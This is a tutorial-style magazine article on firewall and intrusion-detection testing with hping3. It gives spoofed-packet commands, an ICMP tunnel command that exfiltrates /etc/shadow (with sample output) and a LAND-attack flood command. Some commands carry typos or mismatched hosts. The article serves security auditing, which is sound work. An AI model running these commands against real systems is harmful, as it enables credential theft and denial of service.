Security testing with hping
Perimeter testing means determining exactly what your firewall blocks and what it allows. To conduct a good test, you can spoof source IP addresses and source ports:
sudo hping3-a 10.0.44.45 -S james -c 2 -p 80
The result of the above command is that packets will appear to originate from the system at 10.0.44.45. Such a packet is useful for determining whether the firewall is allowing random packets in or out of your network.
In these cases, you don't have to use TCP. Using hping, you can generate UDP packets as well:
sudo hping3 targethost -c 2 --udp --baseport 80 --destport 80
The preceding command sends two UDP packets to port 80 on the target system from port 80 of your own system.
Of course, you can spoof the source IP address as well as the originating and destination ports:
sudo hping3 localhost -a 10.0.44.45 -c 2 --udp --baseport 80 --destport 80
It's not enough to just know about how to use hping3; you need to also understand the basics of a penetration test. A typical test includes the following basic steps:
- Network resource identification: This step is sometimes called network mapping, network footprinting, or target identification. The step involves scanning systems for open ports, fingerprinting operating systems, and determining the types of applications that are operating on open ports.
- Scanning for vulnerabilities: Looking for vulnerabilities on server, firewall, and VoIP operating systems. You also conduct tests designed to break the existing authentication scheme. Once you are finished cracking systems, you then prioritize resources you have identified. For example, a system may have a fairly serious vulnerability that might not be very important. You might need to actually assign this system a lower priority than others that are considered more vital, especially if the vulnerable system isn't likely to become a stage for an attack. Many times, this step is considered part of the network resource identification, but I like to treat this activity as something separate. Determining vulnerabilities is a complex task that requires quite a bit of analytical thought.
- Perimeter testing: A classic activity for hping3. For example, you can use hping3 to generate traffic that tests whether the firewall is capable of blocking spoofed internal packets.
- Intrusion detection testing: In this step, you generate traffic to see if the intrusion detection system is capable of identifying anomalies and problems. Applications such as hping3 are perfect for generating such anomalous traffic.
- Consideration of security policy and end user issues: In this step, you determine the effectiveness of the security policy, and how well the network's applications ensure compliance. You also determine how well end users comply with the security policy. Although this last step isn't really relevant to applications such as hping3, it's important to understand that an auditor does more than scan systems and generate packets.
Creating a tunnel is one way to find out what your firewall is capable of blocking. On your receiving system, issue the following command:
host$ sudo hping3 -i eth0 --listen signature --icmp
To send the contents of the file on your local system to a remote system named james, issue the following command:
user@host:~$ sudo hping3 -I eth0 localhost --icmp -d 100 --sign signature --file /etc/shadow
On your receiving system's terminal, you will see the output of the file you're sending (see Listing 4).
Sending a File
01 Warning: Unable to guess the output interface 02 hping3 listen mode 03 [main] memlockall(): Success 04 Warning: can't disable memory paging! 05 99999:7::: 06 proxy:*:14181:0:99999:7::: 07 www-data:*:14181:0:99999:7::: 08 backup:*:14181:0:99999:99999:7::: 09 proxy:*:14181:0:99999:7::: 10 www-data:*:14181:0:99999:7::: 11 backup:*:14181:0:99999:7::: 12 list:*:14181:0:99999:7::: 13 irc:*:14181:0:99999:7::: 14 gnats:*:14181:0:99999:7::: 15 nobody:*7::: 16 nobody:*^C 17 [code snipped due to hitting Ctrl + C to end the transmission] 18 --- hping statistic --- 19 0 packets transmitted, 0 packets received, 0% packet loss 20 round-trip min/avg/max = 0.0/0.0/0.0 ms
Notice that the contents of the file has been sent through the firewall. Also notice that I've decided to send the contents of a particularly sensitive file. Creating an ad-hoc tunnel in this way allows quick file transfer back and forth across a firewall. Furthermore, this feature is useful for testing exactly what a firewall is capable of blocking.
Choosing an Audit Type
At the risk of oversimplifying, two types of audits exist: blind and non-blind. A blind audit is one in which you adopt the perspective of a hacker who doesn't know about the network and has to discover all of the systems. With non-blind audit, you don't need to worry about discovering the systems; instead, you focus on scanning the systems for vulnerabilities. Regardless of the approach you take to auditing, your goal is to discover resources, show how to penetrate the defenses, and demonstrate how an attack could spread to other systems.
The LAND attack , which first appeared in 1997, involves sending a spoofed packet with its SYN flag activated to a target host. This spoofed packet has the same source IP and source port as the target hosts's IP. When the attack first appeared, it caused unpatched Windows systems (and some Linux systems) to create an infinite connection loop and crash.
Many attackers exploited this bug to wage simple, sophomoric, and highly annoying denial of service attacks. More sophisticated users realized that such attacks were useful for hijacking attacks.
A new variation of the LAND attack turned up in 2005, and this classic technique could easily appear again.
Hping3 can help you ensure that your systems are immune to such an attack. Suppose you want to test a system with the IP address of 192.168.2.3 that has port 139 open. To do so, you would issue the following command:
sudo hping3 -S 192.168.2.3 -a 192.168.2.3 -k -s 139 -p 139 --flood
This attack could cause an unpatched target system to freeze. Also notice the --flood option, which sends thousands of packets to the system.
Buy this article as PDF
A new study says it is possible to unmask 81% of TOR users.
Redmond joins the revolution by turning the .NET Core Runtime into a GitHub project.
Users only had 7 hours to update before the intrusions started.
It's official: The new web arrives
Kernel king admits his tone has alienated volunteers, but says the demands of the process require directness.
New flaw in an old encryption scheme leaves the experts scrambling to disable SSL 3
Lennart Poettering wants to change the way Linux developers talk to each other.
Enterprise giant frees itself from ink and home PCs (and visa versa).
Mozilla’s product think tank sinks silently into history.
TODO group will focus on open source tools in large-scale environments.